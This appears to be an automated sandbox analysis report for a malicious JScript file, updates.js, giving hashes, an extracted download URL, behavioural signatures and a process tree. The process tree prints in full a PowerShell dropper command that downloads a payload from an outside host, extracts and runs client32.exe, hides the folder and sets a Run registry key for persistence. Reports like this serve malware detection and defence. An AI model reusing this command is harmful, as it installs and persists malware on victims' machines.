Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
03-07-2024 13:56
Static task
static1
Behavioral task
behavioral1
Sample
updates.js
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
updates.js
Resource
win10v2004-20240508-en
General
-
Target
updates.js
-
Size
7.3MB
-
MD5
08001e8052c73b35e5fa47df27bcdd45
-
SHA1
9d896ca6e114e945b2ef5b22eb92d08247722468
-
SHA256
c5bc6a2aadb6733ce4850145f9a1fcf5b2cdd0eb1a69f48af9e8867592fcbdd3
-
SHA512
1262b48a72375b52aed6cd9c0631178d489778c29a063f2c716630e2996473faad6185fcd968fbcc38a069bd1a7b5f1ee86c7ad54d53607b9337368a8447efad
-
SSDEEP
49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQX:c
Malware Config
Extracted
http://helpcenter.cyou/help.php?14353
http://helpcenter.cyou/help.php?14353
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2296 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2296 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2296 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2320 wrote to memory of 2296 2320 wscript.exe 28 PID 2320 wrote to memory of 2296 2320 wscript.exe 28 PID 2320 wrote to memory of 2296 2320 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js1⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $YACF='http://helpcenter.cyou/help.php?14353';$SKDYGCJP=(New-Object System.Net.WebClient).DownloadString($YACF);$KLVUO=[System.Convert]::FromBase64String($SKDYGCJP);$asd = Get-Random -Minimum -10 -Maximum 37; $BLQISAM=[System.Environment]::GetFolderPath('ApplicationData')+'\XEHAKRYBE'+$asd;if (!(Test-Path $BLQISAM -PathType Container)) { New-Item -Path $BLQISAM -ItemType Directory };$p=Join-Path $BLQISAM 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$KLVUO);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$BLQISAM)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $BLQISAM 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $BLQISAM -Force; $fd.attributes='Hidden';$s=$BLQISAM+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DENHMTW';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-